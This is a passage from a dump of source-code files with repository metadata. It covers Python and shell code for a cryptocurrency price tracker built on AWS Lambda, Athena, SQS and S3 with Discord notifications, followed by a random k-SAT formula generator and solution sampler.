'\\n'.join(consolidated_dataset)\n with open(output_full_path,\"w\") as hist_file:\n hist_file.write(output_string)\n return output_full_path\n except:\n return \"\"\n\ndef rmdir(directory):\n directory = Path(directory)\n for item in directory.iterdir():\n if item.is_dir():\n rmdir(item)\n else:\n item.unlink()\n directory.rmdir()\n\n\n\n\ndef orchestrate_daily_coin_check():\n \"\"\"\n main function to do the dance of getting all coins from the list,\n then downloading them to a temp file based on the date\n then concatinating all files inside the dir them with a simple loop script\n then compressing them with gz\n then uploading them to s3\n \"\"\"\n\n BUCKET = os.getenv('BUCKET')\n ALL_COINS_PATH = os.getenv('ALL_COINS_PATH')\n DEBUG_WEBHOOK = os.getenv('DEBUG_WEBHOOK')\n \n coins_list = marketsnapshot.get_coins_list()\n\n # coins_list = [{\"id\":\"cointribe\"},{\"id\":\"exodia-inu\"}, {\"id\":\"gameology\"}, {\"id\":\"gameologyv2\"}, {\"id\":\"gameonetoken\"}, {\"id\":\"gamercoin\"} ]\n\n day = utils.datetime_now().shift(days=-1).format(\"YYYY-MM-DD\")\n date_year = arrow.get(day).format(\"YYYY\")\n date_month = arrow.get(day).format(\"MM\")\n date_day = arrow.get(day).format(\"DD\")\n\n temp_write_path = f\"temp_coin_dir/{day}/splitcoins\"\n temp_concatinated_file_path = f\"temp_coin_dir/{day}\"\n Path(temp_write_path).mkdir(parents=True, exist_ok=True)\n Path(temp_concatinated_file_path).mkdir(parents=True, exist_ok=True)\n\n coins_list_ids = []\n for each_item in coins_list:\n if len(each_item[\"id\"]) >0:\n coins_list_ids.append(each_item[\"id\"])\n\n #now lets process the coins\n for each_coin in coins_list_ids:\n time.sleep(0.9)\n utils.notify_discord_bot(f\"looking for {each_coin}\",DEBUG_WEBHOOK)\n try: \n latest_coin_details = getwatchlistdetails.get_coins_details(each_coin)\n \n if isinstance(latest_coin_details, list):\n ldjson = utils.list_of_dicts_to_jsonl(latest_coin_details)\n elif isinstance(latest_coin_details, dict):\n ldjson = utils.dict_to_jsonl(latest_coin_details)\n \n with open(f\"{temp_write_path}/{each_coin}.json\",\"w\") as write_file:\n write_file.write(ldjson)\n except Exception as e:\n print(f\"skipped coin {each_coin} due to errors - {e}\")\n \n utils.notify_discord_bot(f\"daily coin check for all coins complete for {day}. compressing and writing to s3...\",DEBUG_WEBHOOK)\n \n join_files_path = join_multiple_data_files_ldjson(input_folder_path=temp_write_path,output_path=temp_concatinated_file_path, file_prefix=day)\n gz_path = f\"{join_files_path}.gz\"\n \n #write to gz\n with open(join_files_path, 'rb') as orig_file:\n with gzip.open(gz_path, 'wb') as zipped_file:\n zipped_file.writelines(orig_file)\n\n s3_path_prefix = f\"year={date_year}/month={date_month}/day={date_day}\"\n full_path_to_write = f\"{ALL_COINS_PATH}/{s3_path_prefix}/{day}_all_coin_data.json.gz\"\n\n\n if join_files_path != None:\n #open the file \n with open(gz_path, \"rb\") as concat_file:\n concat_contents = concat_file.read()\n outcome = utils.write_to_storage(data=concat_contents,bucket=BUCKET,filename_path=full_path_to_write )\n print(outcome)\n\n rmdir(Path(\"temp_coin_dir/\"))\n utils.notify_discord_bot(f\"daily load complete - {outcome}\",DEBUG_WEBHOOK)\n \n" }, { "alpha_fraction": 0.7236841917037964, "alphanum_fraction": 0.7280701994895935, "avg_line_length": 33.25, "blob_id": "859088f2f399b78b6abbeafc0fc8986f697216c2", "content_id": "9ce4669d88b8789d01143c10b534b3fa061c8686", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 684, "license_type": "no_license", "max_line_length": 88, "num_lines": 20, "path": "/build_zip_for_lambda.sh", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This script will build a .zip file which is ready to be deployed to lambda\n# This will move to cloudformation and build systems once we move to a ci/cd environment\n\n#ensure you have ownership \n# chmod 775 ./build_zip_for_lambda.sh\n\nrm -rf ./zip_builds/**\necho \"Deleted content in the builds directory.\\n Rebuilding...\"\nmkdir ./zip_builds/files/\ncp -R ./src ./zip_builds/files/\ncp ./lambda_function.py ./zip_builds/files/\necho \"Project files copied. Installing packages...\"\npip install -r requirements.txt --target ./zip_builds/files/\necho \"Copy complete. Zipping...\"\ncd ./zip_builds/files/\nzip -r ../deployment-package.zip .\nrm -rf ./zip_builds/files/**\necho \"Complete\"" }, { "alpha_fraction": 0.7335092425346375, "alphanum_fraction": 0.7374669909477234, "avg_line_length": 36.95000076293945, "blob_id": "6d97d8d7af6e1bde9ff9bbecb5a699ff88d0581c", "content_id": "c7284a5eb89b1a56fdf50d2b148b95e9743a243f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 758, "license_type": "no_license", "max_line_length": 88, "num_lines": 20, "path": "/build_zip_for_lambda_coin_getter.sh", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This script will build a .zip file which is ready to be deployed to lambda\n# This will move to cloudformation and build systems once we move to a ci/cd environment\n\n#ensure you have ownership \n# chmod 775 ./build_zip_for_lambda.sh\necho \"building lambda zip for coin_getter\"\nrm -rf ./zip_builds/coin_getter/**\necho \"Deleted content in the builds directory.\\n Rebuilding...\"\nmkdir ./zip_builds/coin_getter/files/\ncp -R ./src/coin_getter/ ./zip_builds/coin_getter/files/\necho \"Project files copied. Installing packages...\"\npip install -r requirements.txt --target ./zip_builds/coin_getter/files/\necho \"Copy complete. Zipping...\"\ncd ./zip_builds/coin_getter/files/\nzip -r ../coin-getter-lambda-package.zip .\ncd ..\nrm -rf ./files/**\necho \"Complete\"" }, { "alpha_fraction": 0.6242274641990662, "alphanum_fraction": 0.6266996264457703, "avg_line_length": 25.032258987426758, "blob_id": "c478f0b9d9cb29279ddb7de69efd2739ccd716d5", "content_id": "8115cc31f75a945c4b41b93d413568bd95b76683", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 809, "license_type": "no_license", "max_line_length": 76, "num_lines": 31, "path": "/src/coin_getter/lambda_function.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "import cgutils\nimport get_coins\nimport time\n\n\ndef lambda_handler(sqs_event, context=\"none\"): \n \"\"\"\n main orchestration executable for coin getter.\n Runs the job with a string as event\n \"\"\"\n coin_id = cgutils.read_sqs_message(sqs_event,key_to_find=\"coin_id\")\n try:\n days = cgutils.read_sqs_message(sqs_event,key_to_find=\"days\")\n except:\n days = 1\n\n\n if len(str(coin_id))==0:\n print(\"coin not included in request. Exiting...\")\n return \"coin not included in request\"\n else:\n \n return get_coins.orchestrate_coin_getter(coin_id=coin_id, days=days)\n # except Exception as e:\n # print(f\"error getting coin: {e}\")\n\n\n\n# print(lambda_handler(my_message,\"\"))\n# lambda_handler(\"bitcoin\",\"\")\n# cgutils.notify_discord_bot(\"report\")\n\n\n" }, { "alpha_fraction": 0.6041948795318604, "alphanum_fraction": 0.6194181442260742, "avg_line_length": 32.1872673034668, "blob_id": "4b52f693ac8e1a4dfc333128a503af1e76d67ddb", "content_id": "52d60ee774a581c4bb192a7b65fbed22798904fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8868, "license_type": "no_license", "max_line_length": 791, "num_lines": 267, "path": "/src/getwatchlistdetails.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nGets the watchlist and queries details for each coin in watchlist\nOutputs details in partitioned watchlist report json\n\"\"\"\nfrom datetime import date\nimport json, os, time\nimport boto3\nfrom pycoingecko import CoinGeckoAPI\nfrom requests.models import HTTPError\nfrom . import utils\n# import utils\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef queue_coins_to_get(days=1):\n \"\"\"\n will prepare list of coin ids we need and enqueue them\n \"\"\"\n print(\"queue_coins_to_get()\")\n watch_list = get_watch_list() #expects list\n cleaned_queue = []\n for each_coin in watch_list:\n if len(each_coin)>0:\n if each_coin not in cleaned_queue:\n cleaned_queue.append(each_coin)\n \n utils.batch_send_to_sqs(coin_list=cleaned_queue,days=days)\n print(\"coins enqueued\")\n\ndef orchestrate_watchlist_details_check():\n \"\"\"\n ** FOR EC2 ***\n *** MAIN ORCHESTRATOR FOR THIS FUNCTIONALITY ***\n orchestrate the querying and processing and storage of market data for coins on watchlist\n then store to s3\n \"\"\"\n print(\"orchestrate_watchlist_details_check()\")\n #query all coins on watchlist and get updated data based on query time (like now)\n watch_list = get_watch_list()\n market_coins = get_coins_data_from_market(watchlist=watch_list)\n\n\n BUCKET = os.getenv('BUCKET')\n COINS_PATH = os.getenv('COINS_PATH')\n COINS_FILENAME = os.getenv('COINS_FILENAME')\n\n date_value = utils.datetime_now()\n\n epoch = round(float(date_value.format(\"X\")))\n year = date_value.year\n month = date_value.month\n day = date_value.day\n\n path = f\"{COINS_PATH}/year={year}/month={month}/day={day}/{epoch}_{COINS_FILENAME}\"\n\n market_coins_jsonl = utils.list_of_dicts_to_jsonl(market_coins)\n status = utils.write_to_storage(data=market_coins_jsonl, bucket=BUCKET, filename_path=path)\n\n return market_coins\n # f\"Updated market details for {len(market_coins)} coins in watch list\"\n\n\n###all the components are below\n\n\ndef get_watch_list():\n \"\"\"\n performs a query from athena to get the watch list\n \"\"\"\n # today_date_epoch = utils.startofday_epohc_now\n \n \n\n ATHENA_WATCHLIST_TABLE = os.getenv('ATHENA_WATCHLIST_TABLE')\n ATHENA_DATABASE = os.getenv('ATHENA_DATABASE')\n\n query = f\"\"\"\n SELECT distinct id\n from {ATHENA_WATCHLIST_TABLE}\n where id != ''\n \"\"\" #change this to id for prod\n\n client = boto3.client('athena', region_name='us-east-1')\n athena_watch_list_query_id = client.start_query_execution(\n QueryString = query,\n \n QueryExecutionContext={\n 'Database': ATHENA_DATABASE,\n 'Catalog': 'AwsDataCatalog'\n },\n ResultConfiguration={\n 'OutputLocation': 's3://athena-query-results-ar-staging/',\n # 'EncryptionConfiguration': {\n # 'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS'\n # }\n },\n )\n\n execution_id = athena_watch_list_query_id['QueryExecutionId']\n \n #check status of query\n status = 'QUEUED'\n while status == 'RUNNING' or status == 'QUEUED':\n time.sleep(1)\n status = client.get_query_execution(QueryExecutionId=execution_id)['QueryExecution']['Status']['State']\n print(status)\n # print(f\"{status} : {execution_id} \\n\\n\")\n\n if status == 'FAILED' or status == 'CANCELLED':\n print(\"query failed!\")\n # exit(0)\n\n athena_watch_list_query_data = client.get_query_results(\n QueryExecutionId=execution_id,\n # NextToken='string',\n # MaxResults=123\n )\n\n #clean up this data\n watchlist = extract_values_from_query_response(athena_watch_list_query_data)\n return watchlist\n\n\n\ndef extract_values_from_query_response(input_payload=None):\n \"\"\"\n takes query results data and returns a list.\n SQS\n \"\"\"\n # mockdata = {'UpdateCount': 0, 'ResultSet': {'Rows': [{'Data': [{'VarCharValue': 'symbol'}]}, {'Data': [{'VarCharValue': 'pappay'}]}, {'Data': [{'VarCharValue': 'akira'}]}, {'Data': [{'VarCharValue': 'akita'}]}], 'ResultSetMetadata': {'ColumnInfo': [{'CatalogName': 'hive', 'SchemaName': '', 'TableName': '', 'Name': 'symbol', 'Label': 'symbol', 'Type': 'varchar', 'Precision': 2147483647, 'Scale': 0, 'Nullable': 'UNKNOWN', 'CaseSensitive': True}]}}, 'ResponseMetadata': {'RequestId': '540e0078-bd31-40e0-9e8e-07d81c1f7496', 'HTTPStatusCode': 200, 'HTTPHeaders': {'content-type': 'application/x-amz-json-1.1', 'date': 'Sun, 31 Oct 2021 02:57:15 GMT', 'x-amzn-requestid': '540e0078-bd31-40e0-9e8e-07d81c1f7496', 'content-length': '690', 'connection': 'keep-alive'}, 'RetryAttempts': 0}}\n # input_payload = mockdata\n\n coins = []\n\n rows = input_payload['ResultSet']['Rows']\n for each_row in rows:\n for each in each_row['Data']:\n for key, value in each.items():\n coins.append(value)\n del coins[0] #remove header\n return coins\n\n\n\n\ndef get_coins_data_from_market(watchlist):\n \"\"\"\n \n given a list of items, query an endpoint and return the data into a list\n then store to s3\n \"\"\"\n\n coins_with_details = []\n for each_coin in watchlist:\n time.sleep(1.1)\n print(f\"looking for {each_coin}\")\n try: \n coins_with_details.append(get_coins_details(each_coin) )\n except:\n print(f\"skipped coin {each_coin} due to errors\")\n \n return coins_with_details\n\n\ndef get_coins_details(coin_id ):\n \"\"\"\n endpoint for getting data for coins details\n pulled out into its own component so we can easily replace \n end_date is required. this allows us to cap the report in days\n \"\"\"\n print(f\"getting coin details for: {coin_id}\")\n cg = CoinGeckoAPI()\n\n max_retries = 10\n retry_number = 0\n wait = 61\n success = False\n while success == False and retry_number < max_retries:\n try:\n coin_details = cg.get_coin_market_chart_by_id(id=coin_id,vs_currency=\"aud\", days=\"max\", interval=\"daily\") #get the 24 hour \n success = True\n except HTTPError as e:\n if e.response.status_code == 429:\n retry_number = retry_number + 1\n print(f\"too many requests error. Waiting {wait} seconds\")\n time.sleep(wait) #wait for this to ease up by waiting for a minute\n else:\n break\n \n\n latest_coin_details = extract_latest_market_value_for_coin(coin_details)\n latest_coin_details[\"id\"] = coin_id #add id to help us joins\n\n return latest_coin_details\n\ndef extract_latest_market_value_for_coin(coin_details):\n \"\"\"\n for coingecko, looks at market data and only gets the values with associated epoch \n \"\"\"\n try:\n latest_coin_data = {\n \"date\": utils.epoch_to_timestamp(coin_details[\"prices\"][-2][0]), #was -1 for latest. lets just get the minight volume\n \"prices\": coin_details[\"prices\"][-2][-1],\n \"market_caps\": coin_details[\"market_caps\"][-2][-1],\n \"total_volumes\": coin_details[\"total_volumes\"][-2][-1],\n \"age\": len(coin_details[\"total_volumes\"])-2\n }\n except:\n latest_coin_data = {\n \"date\": utils.datetime_now().format(\"YYYY-MM-DD HH:mm:ss\"),\n \"prices\": 0,\n \"market_caps\": 0,\n \"total_volumes\": 0,\n \"age\": 0\n }\n\n\n \n\n return latest_coin_data\n\n\ndef extract_historical_market_value_for_coins(coin_details,coin_id,days):\n\n print(\"extract_historical_market_value_for_coins()\")\n end_entry = -1 #the entry which isn't the time at the call - looks like range uses the last item the same as a < symbol. \n\n coins_to_get_startingpoint = 0\n coin_history = []\n\n #apply the indexing based on start and end\n coin_index = []\n \n print(coin_details[\"prices\"][coins_to_get_startingpoint:end_entry])\n for eachindex in coin_details[\"prices\"][coins_to_get_startingpoint:end_entry]:\n # print(eachindex)\n coin_index.append(coin_details[\"prices\"].index(eachindex))\n\n age = 0\n for each_entry in coin_index:\n coin_data = {\n \"id\": coin_id,\n \"date\": utils.epoch_to_timestamp(coin_details[\"prices\"][each_entry][0]), #was -1 for latest. lets just get the minight volume\n \"prices\": coin_details[\"prices\"][each_entry][-1],\n \"market_caps\": coin_details[\"market_caps\"][each_entry][-1],\n \"total_volumes\": coin_details[\"total_volumes\"][each_entry][-1],\n \"age\": age\n }\n age = age + 1\n coin_history.append(coin_data)\n \n return coin_history\n\n\n\n\n# print(get_watch_list() )\n# extract_values_from_query_response()\n\n# print(get_coins_details('akira') )\n# print(utils.startofday_epohc_now() )\n\n# print(orchestrate_watchlist_details_check() )\n\n# for each in range(0,100):\n# print(get_coins_details('akira'))\n \n\n\n" }, { "alpha_fraction": 0.5528700947761536, "alphanum_fraction": 0.5589123964309692, "avg_line_length": 25.95475196838379, "blob_id": "ee5710429cfd00e6b7b86d089d2b0cda18cc9d5b", "content_id": "1a53cb4b492bb705c71629805b66bffb084bbf11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5958, "license_type": "no_license", "max_line_length": 93, "num_lines": 221, "path": "/src/utils.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nShared utilities\n\"\"\"\n\nimport arrow, json, time\nimport re, os\nimport boto3\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef datetime_now():\n \"\"\"\n returns UTC now time\n add .format('YYYY-MM-DD HH:mm:ss ZZ') to convert to ISO\n add .format()\n \"\"\"\n return arrow.utcnow()\n\ndef startofday_epohc_now():\n \"\"\"\n give the epoch of the time at 00:00 hrs in epoch\n \"\"\"\n now_date = arrow.utcnow().format(\"YYYY-MM-DD\")\n now_epoch = arrow.get(now_date).format(\"X\")\n now_epoch = re.sub(r\"\\.0\",\"000\",now_epoch)\n \n return now_epoch\n\ndef epoch_to_timestamp(epoch_string):\n \"\"\"\n converts data from epoch to athena friendly timestamp\n \"\"\"\n \n epoch_string_clean = str(int(epoch_string/1000) ) #remove milliseconds\n try:\n formatted_timestamp = arrow.get(epoch_string_clean,\"X\").format(\"YYYY-MM-DD HH:mm:ss\")\n except:\n formatted_timestamp = datetime_now().format(\"YYYY-MM-DD HH:mm:ss\")\n return formatted_timestamp\n\n\ndef dict_to_jsonl(dict_input):\n \"\"\"\n takes a dict object and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = json.dumps(dict_input)\n jsonl_contents = re.sub(f\"\\n\",\"\",jsonl_contents)\n return jsonl_contents\n\n\ndef list_of_dicts_to_jsonl(list_input):\n \"\"\"\n takes a list of dict objects and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = \"\"\n for each_entry in list_input:\n jsonl_contents = jsonl_contents + \"\\n\" + json.dumps(each_entry)\n\n \n return jsonl_contents\n\n\ndef write_to_storage(data, bucket, filename_path):\n \"\"\"\"\n will write data to a storage location\n \"\"\"\n print(\"performing putObject\")\n client = boto3.client('s3')\n return client.put_object(Body=data, Bucket=bucket, Key=filename_path)\n \ndef read_from_storage(bucket, filename_path):\n \"\"\"\n will read data from a storage location *s3\n \"\"\"\n client = boto3.client('s3')\n response = client.get_object(\n Bucket=bucket,\n Key=filename_path,\n )\n return response\n\ndef notify_discord_bot(text_string,webhook=None):\n \"\"\"\n notifies the discord webhook\n \"\"\"\n if webhook == None:\n DISCORD_BOT_WEBHOOK = os.getenv('DISCORD_BOT_WEBHOOK')\n else:\n DISCORD_BOT_WEBHOOK = webhook\n\n list_of_messages = split_string_discord(text_string)\n\n for each_message in list_of_messages:\n time.sleep(.5)\n data = {\n \"content\": str(each_message)\n }\n response = requests.post(url=DISCORD_BOT_WEBHOOK, json=data)\n print(response)\n \n print(f\"notification complete\")\n\n\ndef split_string_discord(input_string,character_limit=1500):\n \"\"\"\n splits a string into chunks for discord notifications\n \"\"\"\n \n if len(input_string)<= character_limit:\n return [input_string]\n else:\n chunks = input_string.split('\\n')\n messages = []\n chunk_string = \"\"\n for each_item in chunks:\n\n old_chunkstring = chunk_string\n new_chunk_string = f\"{chunk_string}\\n{each_item}\"\n\n if len(new_chunk_string) > character_limit:\n messages.append(old_chunkstring)\n chunk_string = each_item\n elif each_item == chunks[-1]:\n print(\"last message\")\n messages.append(chunk_string)\n else:\n chunk_string = new_chunk_string \n \n \n return messages\n\n\ndef batch_send_to_sqs(coin_list,days=1):\n \"\"\"\n uses batch mode for sqs send to allow 10 coins to be queued per\n \"\"\"\n sqs = boto3.client('sqs')\n\n # queue = sqsResource.get_queue_by_name(QueueName='coin-watch-list')\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n maxBatchSize = 1 #current maximum allowed is 10\n chunks = [coin_list[x:x+maxBatchSize] for x in range(0, len(coin_list), maxBatchSize)]\n time_to_wait = 0\n time_to_wait_interval = 2 #seconds\n for chunk in chunks:\n \n entries = []\n for x in chunk:\n entry = {\n 'Id': str(x),\n 'MessageBody': 'Sent for coin analysis', \n #'MessageGroupId': 'coin-getter',\n #'MessageDeduplicationId': str(x),\n 'MessageAttributes': {\n 'coin_id': {\n 'DataType': 'String',\n 'StringValue': str(x)\n },\n 'days': {\n 'DataType': 'String',\n 'StringValue': str(days)\n }\n }\n }\n entries.append(entry)\n wait_time = time_to_wait + time_to_wait_interval\n response = sqs.send_message_batch(QueueUrl=SQS_QUEUE_URL,Entries=entries)\n print(response)\n\ndef send_to_sqs(coin_id):\n \"\"\"\n send a message to the sqs queue specified by the environment variable\n \"\"\"\n # Create SQS client\n sqs = boto3.client('sqs')\n\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n\n # Send message to SQS queue\n response = sqs.send_message(\n QueueUrl=SQS_QUEUE_URL,\n DelaySeconds=0,\n MessageGroupId=\"coin-getter\",\n MessageDeduplicationId=str(coin_id),\n MessageAttributes={\n 'coin_id': {\n 'DataType': 'String',\n 'StringValue': str(coin_id)\n }\n },\n MessageBody=(\n 'Sent for coin analysis'\n )\n )\n\n print(response['MessageId'])\n\ndef dynamo_put_coin(coin_id, days, dynamodb=None):\n \n table = dynamodb.Table('watchlist')\n response = table.put_item(\n Item={\n 'year': year,\n 'title': title,\n 'info': {\n 'plot': plot,\n 'rating': rating\n }\n }\n )\n return response\n\n\n# send_to_sqs(str(\"bitcoin\"))\n# send_to_sqs(str(\"SurfMoon\"))\n\n# mylist = [\"shibgf\"]\n# batch_send_to_sqs(mylist,days='max')\n\n" } ]
20
alexandreday/kSAT_sample
https://github.com/alexandreday/kSAT_sample
9d4ed1228b316130fe9c463afdb7718744a2a454
70b3634d747400e030eb792681aa50f9311000d4
6f3033db8d2ce7c6fd39303b8abd9acbc9ebd338
refs/heads/master
2018-09-21T18:05:12.079940
2018-06-06T17:37:49
2018-06-06T17:37:49
107,302,324
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5825123190879822, "alphanum_fraction": 0.5899015069007874, "avg_line_length": 22.882352828979492, "blob_id": "67a671ed2a2c75b9b4260aa10e02befa581b83d8", "content_id": "8153e252e4a4ec6519ebe93ae024c6586cb15890", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 812, "license_type": "no_license", "max_line_length": 116, "num_lines": 34, "path": "/script_run/main_kSAT.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "import sys, os\n\n############################ READ COMMAND LINE ##########################\n\nargv = sys.argv\nassert len(argv) == 4 # need to specify number of clauses, alpha and number of samples\nargv = argv[1:]\n\nparam_type={\n 'M':int,\n 'N':int,\n 'n_sample':int\n}\n\nparam = {}\n\nfor a in argv:\n k, v = a.split('=')\n v = int(float(v))\n param[k] = v\n\nprint(param)\nalpha = param['M']/param['N']\n\nnew_dir = 'alpha=%.3f'%alpha\ncmd = 'mkdir %s'%new_dir\ncmd_rm = 'rm -rf %s'%new_dir\nos.system(cmd_rm) # create new directory\nos.system(cmd) # create new directory\nos.system('cp merge sp verify walksat kSAT.py check_sol.py %s/'%new_dir)\nos.chdir(new_dir)\nnew_cmd = '~/.conda/envs/py35/bin/python kSAT.py n=%i alpha=%.3f n_sample=%i'%(param['N'], alpha, param['n_sample'])\n#print(new_cmd)\nos.system(new_cmd)\n" }, { "alpha_fraction": 0.5115276575088501, "alphanum_fraction": 0.5251603722572327, "avg_line_length": 39.5528450012207, "blob_id": "4826e8f8a57dc5b8de0e6781cf923ea0e116a8ae", "content_id": "ff0d44e50ec2863992a332f44f1c4c751f89d8da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9977, "license_type": "no_license", "max_line_length": 164, "num_lines": 246, "path": "/kSAT.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pickle, os, sys\nimport time\n\n\ndef main():\n \"\"\"\n Use in the following way (example):\n python kSAT.py n=1000 alpha=3.5 n_sample=10000\n\n What the code below does:\n\n -> Generates a random K-SAT (pure K-SAT) formula, which is save in \"formula.tmp_N=%_M=%i_alpha=%.2f_K=%i.cnf\" file\n -> Tries to find solutions to that formula. the number of desired solution is specified by the n_sample parameter\n -> Solutions are written in (example) files with names of the form sol_N1000=_M=3900_alpha=3.90_K=3.txt.\n \n\n \"\"\"\n argv = sys.argv[1:]\n type_arg = {'n':int,'alpha':float,'n_sample':int}\n tmp = {a.split('=')[0]:a.split('=')[1] for a in argv}\n for k,v in tmp.items():\n tmp[k] = type_arg[k](float(v))\n\n assert len(tmp) == 3, \"need to specify the 3 parameters, example : n=1000 alpha=3.5 n_sample=10000\"\n \n model = KSAT(N_ = tmp['n'], alpha_ = tmp['alpha'], K_ = 3, random_state=0) # kSAT class\n N, M, alpha, K = model.get_param()\n formula_file = \"formula.tmp_N=%i_M=%i_alpha=%.2f_K=%i.cnf\"%(N, M, alpha, K)\n \n model.generate_formula(savefile=formula_file) # generate random formula (optional)\n model.solve_formula(read_file=formula_file, n_sample=tmp['n_sample']) # read formula written in read_file and runs sp code\n\n################################\n################################\n################################\n\ndef save(obj, file):\n f = open(file,'wb')\n pickle.dump(obj,f)\n f.close()\n\ndef load(file):\n f = open(file,'rb')\n return pickle.load(f)\n\nclass KSAT:\n\n def __init__(self, N_ = 1000, alpha_ = 3.8, K_=3, random_state = 0):\n np.random.seed(random_state) # by default u always get the same thing for the same parameters !\n self.N = N_\n self.alpha = alpha_\n self.K = K_\n self.M = round(self.N * self.alpha)\n \n def get_param(self):\n return self.N, self.M, self.alpha, self.K\n\n def generate_formula(self, savefile = None):\n \"\"\" Generates a random formula based on N,M,alpha,K parameters specified in the constructor\n \n Parameters\n -------------\n savefile: str, optional\n file in which the CNF formula is to be saved. This is done via np.savetxt()\n \n Returns\n -------\n self\n \"\"\"\n\n N, M, alpha, K = self.get_param()\n all_idx = np.arange(1, N+1,dtype=int)\n signs = np.array([-1,1],dtype=int)\n\n clause_set = set([])\n while len(clause_set) < M:\n literals = np.random.choice(all_idx, size=K, replace=False)\n clause = literals*np.random.choice(signs, size=K)\n clause_set.add(tuple(clause))\n\n zeros = np.zeros(M,dtype=int).reshape(-1,1)\n self.formula = np.array(list(clause_set))\n\n if savefile is not None:\n np.savetxt(savefile, np.hstack((self.formula, zeros)), fmt='%i', delimiter=\" \", header = 'p cnf %i %i'%(N,M), comments='')\n\n return self\n\n def solve_formula(self, read_file = None, n_sample = 1):\n \n N, M, alpha, K = self.get_param()\n seed = np.random.randint(0, sys.maxsize)\n solutions = []\n zeros = np.zeros(M,dtype=int).reshape(-1,1)\n restart_count = 0\n n_restart = 50\n\n ## reading formula file or generating new random formula \n if read_file is None:\n formula_file = \"formula.tmp_N=%i_M=%i_alpha=%.2f_K=%i.cnf\"%(N, M, alpha, K) # meaningful file name !\n self.generate_formula(savefile=formula_file)\n formula = self.formula\n else:\n formula_file = read_file\n formula = np.loadtxt(formula_file, dtype=int, skiprows=1, delimiter=' ')[:,:3]\n \n if n_sample == 1:\n os.system(\"./sp -l %s -s%i\"%(formula_file,seed))\n else:\n nn =0 \n while nn < n_sample:\n os.system(\"rm noconvergence.tmp.cnf\")\n\n if restart_count > n_restart :\n \"X permutations, still not working !\"\n print(\"Stopping, no solutions found !\")\n break\n\n print(\"----------------> sample # \\t\", nn)\n #print(restart_count)\n #For generating SAT solutions sampled uniformly at random !\n\n idx_ori = np.arange(1, N+1, dtype=int)\n idx_new = np.arange(1, N+1, dtype=int)\n np.random.shuffle(idx_new)\n \n rand_permutation_map = dict(zip(idx_ori,idx_new))\n inv_rand_permutation_map = dict(zip(idx_new,idx_ori))\n\n isometry_formula = np.array([np.sign(x)*rand_permutation_map[abs(x)] for x in formula.flatten()], dtype=int)\n isometry_formula=isometry_formula.reshape(-1, K)\n \n file_tmp = '.tmp.cnf.formula.permutation'\n np.savetxt('.tmp.cnf.formula.permutation', np.hstack((isometry_formula, zeros)), fmt='%i', delimiter=\" \", header = 'p cnf %i %i'%(N,M), comments='')\n\n seed = np.random.randint(0,2**32-1)\n os.system(\"./sp -l %s -s%i > out.txt\"%(file_tmp, seed)) # solves the permuted formula (equivalent !)\n\n if os.path.exists(\"noconvergence.tmp.cnf\"):\n \"Solution not find, try a different permutation\"\n restart_count +=1\n else:\n nn+=1\n restart_count = 0\n\n if self.check_solution(solution_file='solution.tmp.lst', formula_file='.tmp.cnf.formula.permutation'):\n sol_tmp = np.loadtxt('solution.tmp.lst', dtype=int)\n sol_tmp_2 = np.array([np.sign(v)*inv_rand_permutation_map[abs(v)] for v in sol_tmp], dtype=int)\n sol_tmp_2 = sol_tmp_2[np.argsort(np.abs(sol_tmp_2))]\n \n is_solution = self.check_solution(solution_array=sol_tmp_2)\n if is_solution:\n solutions.append(sol_tmp_2)\n if nn % (n_sample // 10) == 0 and n_sample > 10 and len(solutions) > 0:\n print(nn, \" saving\")\n solution_stack = np.sign(np.vstack(solutions))\n solution_stack[solution_stack < 0] = 0\n save(np.packbits(solution_stack),'sol_N=%i_M=%i_alpha=%.2f_K=%i.pkl'%(N,M,alpha,K))\n #np.savetxt('sol_N=%i_M=%i_alpha=%.2f_K=%i.txt'%(N,M,alpha,K), np.packbits(solution_stack, axis=1), fmt=\"%i\")\n \n if len(solutions) > 0:\n solution_stack = np.sign(np.vstack(solutions))\n solution_stack[solution_stack < 0] = 0\n save(np.packbits(solution_stack), 'sol_N=%i_M=%i_alpha=%.2f_K=%i.pkl'%(N,M,alpha,K))\n #np.savetxt('sol_N=%i_M=%i_alpha=%.2f_K=%i.txt'%(N,M,alpha,K), np.packbits(solution_stack, axis=1), fmt=\"%i\")\n #np.savetxt('sol_N=%i_M=%i_alpha=%.2f_K=%i.txt'%(N,M,alpha,K), solution_stack,fmt=\"%i\")\n #print(np.vstack(solutions)[:,:10])\n\n def check_all_solution(self, N, solution_file, formula_file, hist=True):\n formula = np.loadtxt(formula_file, dtype=int, skiprows=1, delimiter=' ')[:,:3]\n self.formula = formula\n tmp = np.unpackbits(load(solution_file),axis=1)[:,N]\n all_solution = tmp.astype(int)\n N_sol = all_solution.shape[0]\n\n\n sol_result=[]\n idx_var = np.arange(1,N+1,dtype=int)\n\n count_true = 0\n print(\"Checking %i solutions\"%N_sol)\n for i in 